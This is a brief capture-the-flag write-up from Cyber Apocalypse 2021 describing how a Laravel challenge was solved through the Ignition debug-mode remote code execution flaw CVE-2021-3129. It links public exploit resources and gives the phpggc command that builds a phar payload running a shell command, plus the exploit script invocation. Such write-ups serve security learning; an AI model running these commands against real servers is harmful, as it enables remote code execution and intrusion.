Cyber Apocalypse 2021


Solved by: Nigamelastic

  • The hint for this challenge talks about being stuck in debug.
  • Some research shows there is a CVE for this, and the Laravel version were working with is vulnerable.
  • https://www.exploit-db.com/exploits/49424
  • https://www.youtube.com/watch?v=gr8ZKQpYiug&

CVE-2021-3129 : https://nvd.nist.gov/vuln/detail/CVE-2021-3129

  • Find
  • For a laravel panel with error messages and stack trace.

  • https://www.ambionics.io/blog/laravel-debug-rce
  • As mentioned in the blog above i tried performing a post request but it gave me a 302 response
  • but the above link mentions their github page and exploit which is https://github.com/ambionics/phpggc and https://github.com/ambionics/laravel-exploits

the idea is to get the phar file with ur custom command from 1st repo and then put the phar file into the exploit with specified url to run the exploit PS: for a linux command with spaces simply use "

  • so for our case since we know the flag was found on the root directory and its name as
  • our phpggc command should be
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /flagM1AhS"
  • run that in the exploit as:
./laravel-ignition-rce.py /tmp/exploit.phar
  • and we have the flag:
Published on : 24 Apr 2021